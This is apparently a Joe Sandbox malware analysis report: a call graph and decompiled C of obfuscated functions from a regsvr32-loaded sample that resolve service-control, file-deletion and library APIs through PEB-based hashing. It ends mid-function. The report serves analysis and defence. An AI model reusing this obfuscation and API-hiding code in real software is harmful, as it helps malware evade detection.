4727 8d8ce7 4580->4727 4582 8e7e3d 2 API calls 4584 8de08b 4582->4584 4583 8e02d8 2 API calls 4583->4584 4584->4582 4584->4583 4585 8d3466 2 API calls 4584->4585 4586 8e4e54 3 API calls 4584->4586 4587 8e17d2 GetPEB 4584->4587 4588 8ef5d9 GetPEB RtlAllocateHeap 4584->4588 4589 8de4cd 4584->4589 4590 8e0184 GetPEB 4584->4590 4592 8f0575 GetPEB 4584->4592 4593 8dd467 GetPEB 4584->4593 4595 8d2263 GetPEB 4584->4595 4596 8e9054 GetPEB 4584->4596 4597 8e8eb3 GetPEB 4584->4597 4598 8ef94b GetPEB 4584->4598 4599 8f05f6 3 API calls 4584->4599 4730 8da4de 4584->4730 4736 8e68c8 4584->4736 4585->4584 4586->4584 4587->4584 4588->4584 4589->3961 4590->4584 4592->4584 4593->4584 4595->4584 4596->4584 4597->4584 4598->4584 4599->4584 4605 8e701b 4600->4605 4601 8e708b 4601->3961 4602 8e17d2 GetPEB 4602->4605 4603 8d79cc GetPEB 4603->4605 4604 8f1be6 GetPEB 4604->4605 4605->4601 4605->4602 4605->4603 4605->4604 4606 8e02d8 2 API calls 4605->4606 4606->4605 4617 8ea151 4607->4617 4608 8d3466 2 API calls 4608->4617 4609 8ea36e 4609->3961 4610 8f0575 GetPEB 4610->4617 4611 8d2263 GetPEB 4611->4617 4612 8e9054 GetPEB 4612->4617 4613 8ef94b GetPEB 4613->4617 4614 8ef5d9 GetPEB RtlAllocateHeap 4614->4617 4615 8e4e54 3 API calls 4615->4617 4616 8e8eb3 GetPEB 4616->4617 4617->4608 4617->4609 4617->4610 4617->4611 4617->4612 4617->4613 4617->4614 4617->4615 4617->4616 4618 8f05f6 3 API calls 4617->4618 4618->4617 4620 8dc3cc 4619->4620 4621 8e0231 GetPEB 4620->4621 4622 8dc4cc 4620->4622 4623 8e3e89 GetPEB 4620->4623 4625 8dc4ca 4620->4625 4626 8d7013 GetPEB 4620->4626 4621->4620 4624 8f1be6 GetPEB 4622->4624 4623->4620 4624->4625 4625->3961 4626->4620 4628 8d999b 4627->4628 4629 8e4e54 3 API calls 4628->4629 4630 8f0575 GetPEB 4628->4630 4631 8d9aed 4628->4631 4632 8d2263 GetPEB 4628->4632 4633 8e9054 GetPEB 4628->4633 4634 8ef5d9 2 API calls 4628->4634 4635 8e8eb3 GetPEB 4628->4635 4636 8ef94b GetPEB 4628->4636 4637 8f05f6 3 API calls 4628->4637 4629->4628 4630->4628 4631->3961 4632->4628 4633->4628 4634->4628 4635->4628 4636->4628 4637->4628 4639 8e3ea4 4638->4639 4640 8e4164 4639->4640 4659 8d427c 4639->4659 4640->4555 4643 8efd42 GetPEB 4644 8e411b 4643->4644 4644->4640 4645 8efd42 GetPEB 4644->4645 4645->4644 4647 8d702a 4646->4647 4648 8d31ea GetPEB 4647->4648 4649 8d71d4 4647->4649 4663 8f1da1 4647->4663 4648->4647 4649->4555 4652 8e0256 4651->4652 4653 8d7f78 GetPEB 4652->4653 4654 8e02c5 4653->4654 4654->4555 4656 8f1bf9 4655->4656 4667 8ea873 4656->4667 4660 8d429a 4659->4660 4661 8d7f78 GetPEB 4660->4661 4662 8d42ff 4661->4662 4662->4640 4662->4643 4664 8f1dba 4663->4664 4665 8d7f78 GetPEB 4664->4665 4666 8f1e3b 4665->4666 4666->4647 4668 8ea88e 4667->4668 4669 8d7f78 GetPEB 4668->4669 4670 8ea906 4669->4670 4670->4552 4674 8e39a7 4671->4674 4673 8f131d GetPEB 4673->4674 4674->4673 4676 8e3b7f 4674->4676 4677 8e3b6a 4674->4677 4703 8dcbbf 4674->4703 4707 8eec35 4674->4707 4676->4561 4678 8e02d8 2 API calls 4677->4678 4678->4676 4680 8e906e 4679->4680 4681 8dcca2 GetPEB 4680->4681 4682 8e9163 4681->4682 4682->4561 4684 8f0618 4683->4684 4685 8ea50a 2 API calls 4684->4685 4686 8f0876 4684->4686 4687 8f0863 4684->4687 4711 8d7e8a 4684->4711 4685->4684 4686->4561 4689 8e02d8 2 API calls 4687->4689 4689->4686 4698 8d7223 4690->4698 4691 8e25cd GetPEB 4691->4698 4693 8d773f 4723 8e8e1d 4693->4723 4694 8ef5d9 2 API calls 4694->4698 4696 8d773d 4696->4561 4698->4691 4698->4693 4698->4694 4698->4696 4699 8ef94b GetPEB 4698->4699 4715 8f22f2 4698->4715 4719 8e23c7 4698->4719 4699->4698 4701 8d7f78 GetPEB 4700->4701 4702 8f139a 4701->4702 4702->4561 4704 8dcbeb 4703->4704 4705 8d7f78 GetPEB 4704->4705 4706 8dcc88 4705->4706 4706->4674 4708 8eec4c 4707->4708 4709 8d7f78 GetPEB 4708->4709 4710 8eecd5 4709->4710 4710->4674 4712 8d7eb1 4711->4712 4713 8d7f78 GetPEB 4712->4713 4714 8d7f13 4713->4714 4714->4684 4716 8f2310 4715->4716 4717 8d7f78 GetPEB 4716->4717 4718 8f23a9 4717->4718 4718->4698 4720 8e2408 4719->4720 4721 8d7f78 GetPEB 4720->4721 4722 8e247e 4721->4722 4722->4698 4724 8e8e30 4723->4724 4725 8d7f78 GetPEB 4724->4725 4726 8e8ea8 4725->4726 4726->4696 4728 8d7f78 GetPEB 4727->4728 4729 8d8d75 4728->4729 4729->4584 4733 8da504 4730->4733 4731 8d303a 2 API calls 4731->4733 4732 8da73d 4735 8d4e8f GetPEB 4732->4735 4733->4731 4733->4732 4734 8da73b 4733->4734 4734->4584 4735->4734 4737 8e68f7 4736->4737 4738 8d7f78 GetPEB 4737->4738 4739 8e697d 4738->4739 4739->4584 4741 8dd3d5 4740->4741 4742 8d7f78 GetPEB 4741->4742 4743 8dd45b 4742->4743 4743->3978 4745 8dc0ca 4744->4745 4746 8d7f78 GetPEB 4745->4746 4747 8dc145 4746->4747 4747->3978 4749 8f0e0b 4748->4749 4750 8d7f78 GetPEB 4749->4750 4751 8f0e6a 4750->4751 4751->3985 4753 8e266d 4752->4753 4754 8d7f78 GetPEB 4753->4754 4755 8e26e4 4754->4755 4755->3985 4757 8d2312 4756->4757 4758 8e0430 GetPEB 4757->4758 4759 8d303a 2 API calls 4757->4759 4760 8d25ce 4757->4760 4761 8d2606 4757->4761 4758->4757 4759->4757 4770 8e0430 4760->4770 4761->3985 4764 8d7f78 GetPEB 4763->4764 4765 8e3e80 4764->4765 4765->3985 4767 8d7c8d 4766->4767 4768 8d7f78 GetPEB 4767->4768 4769 8d7cf8 4768->4769 4769->3985 4771 8e0463 4770->4771 4772 8d7f78 GetPEB 4771->4772 4773 8e04eb 4772->4773 4773->4761 4775 8eee30 4774->4775 4776 8d7f78 GetPEB 4775->4776 4777 8eeeb4 4776->4777 4777->3826 4779 8e6d86 4778->4779 4780 8d7f78 GetPEB 4779->4780 4781 8e6e0c 4780->4781 4781->3996 4783 8d3f7b 4782->4783 4785 8d419a 4783->4785 4793 8d41f2 4783->4793 4803 8d3dfb 4783->4803 4786 8de4f5 2 API calls 4785->4786 4787 8d41ac 4786->4787 4794 8e3094 4787->4794 4792 8ef94b GetPEB 4792->4793 4793->4006 4807 8e3c24 4794->4807 4796 8d41b8 4799 8d7f31 4796->4799 4800 8d7f56 4799->4800 4801 8dadb7 GetPEB 4800->4801 4802 8d41db 4801->4802 4802->4792 4804 8d3e15 4803->4804 4805 8d7f78 GetPEB 4804->4805 4806 8d3e89 4805->4806 4806->4783 4808 8e3c40 4807->4808 4809 8d7f78 GetPEB 4808->4809 4810 8e31d0 4809->4810 4810->4796 4811 8e660b 4810->4811 4812 8e6638 4811->4812 4813 8d7f78 GetPEB 4812->4813 4814 8e66b2 4813->4814 4814->4796 4816 8d3ed1 4815->4816 4817 8d7f78 GetPEB 4816->4817 4818 8d3f40 4817->4818 4818->4014 4820 8e7a94 4819->4820 4821 8d7f78 GetPEB 4820->4821 4822 8e7b0d 4821->4822 4822->4014 4824 8e3cd4 4823->4824 4825 8d7f78 GetPEB 4824->4825 4826 8e3d50 4825->4826 4826->4014 4838 8e86ee 4827->4838 4831 8e7bbf 4830->4831 4861 8dbd6b 4831->4861 4834 8e7d95 4834->4024 4837 8e02d8 2 API calls 4837->4834 4842 8e871a 4838->4842 4841 8e8946 4843 8e02d8 2 API calls 4841->4843 4842->4841 4844 8dcaf4 4842->4844 4847 8d823e 4842->4847 4851 8dbe5e 4842->4851 4854 8efc9e 4842->4854 4858 8d26a7 4842->4858 4843->4844 4844->4024 4848 8d8254 4847->4848 4849 8d7f78 GetPEB 4848->4849 4850 8d82c4 4849->4850 4850->4842 4852 8d7f78 GetPEB 4851->4852 4853 8dbed7 4852->4853 4853->4842 4855 8efcb7 4854->4855 4856 8d7f78 GetPEB 4855->4856 4857 8efd34 4856->4857 4857->4842 4859 8e1919 GetPEB 4858->4859 4860 8d26f5 4859->4860 4860->4842 4862 8d7f78 GetPEB 4861->4862 4863 8dbdda 4862->4863 4863->4834 4864 8ef73b 4863->4864 4865 8ef75d 4864->4865 4866 8d7f78 GetPEB 4865->4866 4867 8e7d83 4866->4867 4867->4837 4875 8ee8c1 4868->4875 4869 8d303a 2 API calls 4869->4875 4870 8eea86 4871 8e17d2 GetPEB 4870->4871 4872 8eea97 4871->4872 4872->4046 4874 8ef5d9 2 API calls 4874->4875 4875->4869 4875->4870 4875->4872 4875->4874 4876 8f224c GetPEB 4875->4876 4877 8ef94b GetPEB 4875->4877 4886 8e8ef8 4875->4886 4876->4875 4877->4875 4879 8e8d5c 4878->4879 4880 8e8d46 4878->4880 4879->4046 4880->4879 4881 8e17d2 GetPEB 4880->4881 4881->4880 4883 8dbe04 4882->4883 4890 8d7d03 4883->4890 4887 8e8f15 4886->4887 4888 8d303a 2 API calls 4887->4888 4889 8e9000 4888->4889 4889->4875 4893 8d7d1b 4890->4893 4895 8d7e65 4893->4895 4896 8d7e67 4893->4896 4898 8d303a 2 API calls 4893->4898 4899 8e0503 4893->4899 4915 8e8d61 4893->4915 4920 8d2710 4893->4920 4895->4046 4897 8e17d2 GetPEB 4896->4897 4897->4895 4898->4893 4913 8e12cb 4899->4913 4900 8e2519 GetPEB 4900->4913 4906 8ea379 GetPEB 4906->4913 4907 8e17c5 4907->4893 4908 8ef5d9 GetPEB RtlAllocateHeap 4908->4913 4910 8efd42 GetPEB 4910->4913 4912 8dd2c9 GetPEB 4912->4913 4913->4900 4913->4906 4913->4907 4913->4908 4913->4910 4913->4912 4914 8ef94b GetPEB 4913->4914 4929 8d866c 4913->4929 4933 8e64cf 4913->4933 4937 8ded0a 4913->4937 4951 8dc98b 4913->4951 4955 8e970d 4913->4955 4959 8da838 4913->4959 4963 8dc01c 4913->4963 4914->4913 4916 8e64cf GetPEB 4915->4916 4917 8e8e04 4916->4917 4918 8e17d2 GetPEB 4917->4918 4919 8e8e16 4918->4919 4919->4893 4924 8d2d16 4920->4924 4921 8d2edc 4923 8e2519 GetPEB 4921->4923 4922 8d2eda 4922->4893 4923->4922 4924->4921 4924->4922 4925 8ef5d9 GetPEB RtlAllocateHeap 4924->4925 4926 8d866c GetPEB 4924->4926 4927 8dd2c9 GetPEB 4924->4927 4928 8ef94b GetPEB 4924->4928 4925->4924 4926->4924 4927->4924 4928->4924 4930 8d86a1 4929->4930 4931 8d7f78 GetPEB 4930->4931 4932 8d8728 4931->4932 4932->4913 4934 8e64e2 4933->4934 4935 8d7f78 GetPEB 4934->4935 4936 8e6555 4935->4936 4936->4913 4950 8dfc94 4937->4950 4938 8e014c 4940 8e2519 GetPEB 4938->4940 4939 8e014a 4939->4913 4940->4939 4941 8e17d2 GetPEB 4941->4950 4943 8d303a 2 API calls 4943->4950 4944 8ef5d9 GetPEB RtlAllocateHeap 4944->4950 4945 8deb4b GetPEB 4945->4950 4946 8ef94b GetPEB 4946->4950 4947 8e0184 GetPEB 4947->4950 4948 8dd2c9 GetPEB 4948->4950 4950->4938 4950->4939 4950->4941 4950->4943 4950->4944 4950->4945 4950->4946 4950->4947 4950->4948 4967 8d7a69 4950->4967 4971 8ea42c 4950->4971 4952 8dc9a7 4951->4952 4953 8d7f78 GetPEB 4952->4953 4954 8dca27 4953->4954 4954->4913 4956 8e972f 4955->4956 4957 8d7f78 GetPEB 4956->4957 4958 8e979e 4957->4958 4958->4913 4960 8da865 4959->4960 4961 8d7f78 GetPEB 4960->4961 4962 8da8e7 4961->4962 4962->4913 4964 8dc035 4963->4964 4965 8d7f78 GetPEB 4964->4965 4966 8dc0ac 4965->4966 4966->4913 4968 8d7a97 4967->4968 4969 8d7f78 GetPEB 4968->4969 4970 8d7b06 4969->4970 4970->4950 4972 8ea461 4971->4972 4973 8d7f78 GetPEB 4972->4973 4974 8ea4e8 4973->4974 4974->4950 4977 8f1a26 4975->4977 4976 8e25cd GetPEB 4976->4977 4977->4976 4978 8f1b7b 4977->4978 4981 8f1b98 4977->4981 4999 8d94d4 4977->4999 4995 8d33b6 4978->4995 4981->4058 4986 8dc83c 4982->4986 4983 8ef5d9 2 API calls 4983->4986 4984 8dc967 4985 8e3cbe GetPEB 4984->4985 4989 8dc965 4985->4989 4986->4983 4986->4984 4987 8d3e99 GetPEB 4986->4987 4988 8ef94b GetPEB 4986->4988 4986->4989 5003 8d6c71 4986->5003 4987->4986 4988->4986 4989->4058 4992 8d35ca 4991->4992 4993 8d7f78 GetPEB 4992->4993 4994 8d3643 4993->4994 4994->4057 4996 8d33d4 4995->4996 4997 8d7f78 GetPEB 4996->4997 4998 8d3453 4997->4998 4998->4981 5000 8d94f1 4999->5000 5001 8d7f78 GetPEB 5000->5001 5002 8d957c 5001->5002 5002->4977 5004 8d6c8e 5003->5004 5005 8d7f78 GetPEB 5004->5005 5006 8d6d06 5005->5006 5006->4986 5040 8d4313 5046 8d484a 5040->5046 5042 8d303a 2 API calls 5042->5046 5043 8e17d2 GetPEB 5043->5046 5044 8d4a79 5045 8e02d8 2 API calls 5044->5045 5048 8d4a77 5045->5048 5046->5042 5046->5043 5046->5044 5047 8f0575 GetPEB 5046->5047 5046->5048 5049 8dbee4 GetPEB 5046->5049 5051 8d2263 GetPEB 5046->5051 5052 8ea50a 2 API calls 5046->5052 5053 8eeb61 5046->5053 5057 8e487b 5046->5057 5047->5046 5049->5046 5051->5046 5052->5046 5054 8eeb8f 5053->5054 5055 8d7f78 GetPEB 5054->5055 5056 8eec19 5055->5056 5056->5046 5058 8e488b 5057->5058 5059 8d7f78 GetPEB 5058->5059 5060 8e4902 5059->5060 5060->5046

                                                                                                                Executed Functions

                                                                                                                Function 008D6E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 8d6e01-8d6eb3 call 8dc98a call 8d7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E008D6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E008DC98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E008D7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x008d6e0a
                                                                                                                0x008d6e0b
                                                                                                                0x008d6e0e
                                                                                                                0x008d6e11
                                                                                                                0x008d6e14
                                                                                                                0x008d6e1c
                                                                                                                0x008d6e23
                                                                                                                0x008d6e2c
                                                                                                                0x008d6e33
                                                                                                                0x008d6e36
                                                                                                                0x008d6e42
                                                                                                                0x008d6e47
                                                                                                                0x008d6e4c
                                                                                                                0x008d6e53
                                                                                                                0x008d6e5d
                                                                                                                0x008d6e65
                                                                                                                0x008d6e6d
                                                                                                                0x008d6e74
                                                                                                                0x008d6e7b
                                                                                                                0x008d6e82
                                                                                                                0x008d6e89
                                                                                                                0x008d6ea0
                                                                                                                0x008d6ead
                                                                                                                0x008d6eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 008D6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 257b6464e1494cbdad8a575437aa667795310d75e9434ce8baa954899df7e8b1
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: E31188B2D01218BBDB04DFA9C8498DEBFB6EF41310F10C189F518A7241D7B55B118F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D8E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 8d8e38-8d8ee4 call 8dc98a call 8d7f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E008D8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E008DC98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E008D7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x008d8e3f
                                                                                                                0x008d8e42
                                                                                                                0x008d8e44
                                                                                                                0x008d8e47
                                                                                                                0x008d8e4a
                                                                                                                0x008d8e4e
                                                                                                                0x008d8e4f
                                                                                                                0x008d8e54
                                                                                                                0x008d8e5e
                                                                                                                0x008d8e64
                                                                                                                0x008d8e6b
                                                                                                                0x008d8e72
                                                                                                                0x008d8e79
                                                                                                                0x008d8e80
                                                                                                                0x008d8e8c
                                                                                                                0x008d8e94
                                                                                                                0x008d8e9c
                                                                                                                0x008d8ea3
                                                                                                                0x008d8eaa
                                                                                                                0x008d8ebc
                                                                                                                0x008d8ebf
                                                                                                                0x008d8ecf
                                                                                                                0x008d8ede
                                                                                                                0x008d8ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008D8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: b42c59893fb7e64247e7c54fe459650a93899ac9dd8c57468769829264544861
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 86112571D01208FBDF05DF94DA4A8DEBFB6EF05314F10C189E914A6250E7755B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D7BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 8d7bc6-8d7c79 call 8dc98a call 8d7f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E008D7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E008DC98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E008D7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x008d7bcc
                                                                                                                0x008d7bd1
                                                                                                                0x008d7bd6
                                                                                                                0x008d7bdd
                                                                                                                0x008d7be3
                                                                                                                0x008d7bea
                                                                                                                0x008d7bf6
                                                                                                                0x008d7bfb
                                                                                                                0x008d7c00
                                                                                                                0x008d7c07
                                                                                                                0x008d7c0e
                                                                                                                0x008d7c15
                                                                                                                0x008d7c1c
                                                                                                                0x008d7c23
                                                                                                                0x008d7c2a
                                                                                                                0x008d7c31
                                                                                                                0x008d7c3b
                                                                                                                0x008d7c43
                                                                                                                0x008d7c4b
                                                                                                                0x008d7c52
                                                                                                                0x008d7c69
                                                                                                                0x008d7c74
                                                                                                                0x008d7c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 008D7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 3c0add7c3df98f222d3eec486903647006693c349c5f7912b16b2317baa099df
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: BB116DB1D0024CFFDB18DFE9D94AA9EBBB1EB40304F208199E414B7290D7B65B548F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008EED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 8eed7b-8eee13 call 8dc98a call 8d7f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E008EED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E008DC98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E008D7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x008eed82
                                                                                                                0x008eed85
                                                                                                                0x008eed87
                                                                                                                0x008eed8b
                                                                                                                0x008eed8c
                                                                                                                0x008eed91
                                                                                                                0x008eed9b
                                                                                                                0x008eeda4
                                                                                                                0x008eedab
                                                                                                                0x008eedb7
                                                                                                                0x008eedbc
                                                                                                                0x008eedc4
                                                                                                                0x008eedcc
                                                                                                                0x008eedd4
                                                                                                                0x008eeddb
                                                                                                                0x008eede2
                                                                                                                0x008eede9
                                                                                                                0x008eeded
                                                                                                                0x008eee04
                                                                                                                0x008eee0d
                                                                                                                0x008eee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 008EEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: c853e5ec59025cca4f6575c9688519cf38bd49b38e43e1ab1e08cb504a986e33
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 01015B71D00208BFDB18DFA5C94A8DEBFB5EF45324F10C18AE914A7241E7B25B558F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D4A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E008D4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E008DC98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
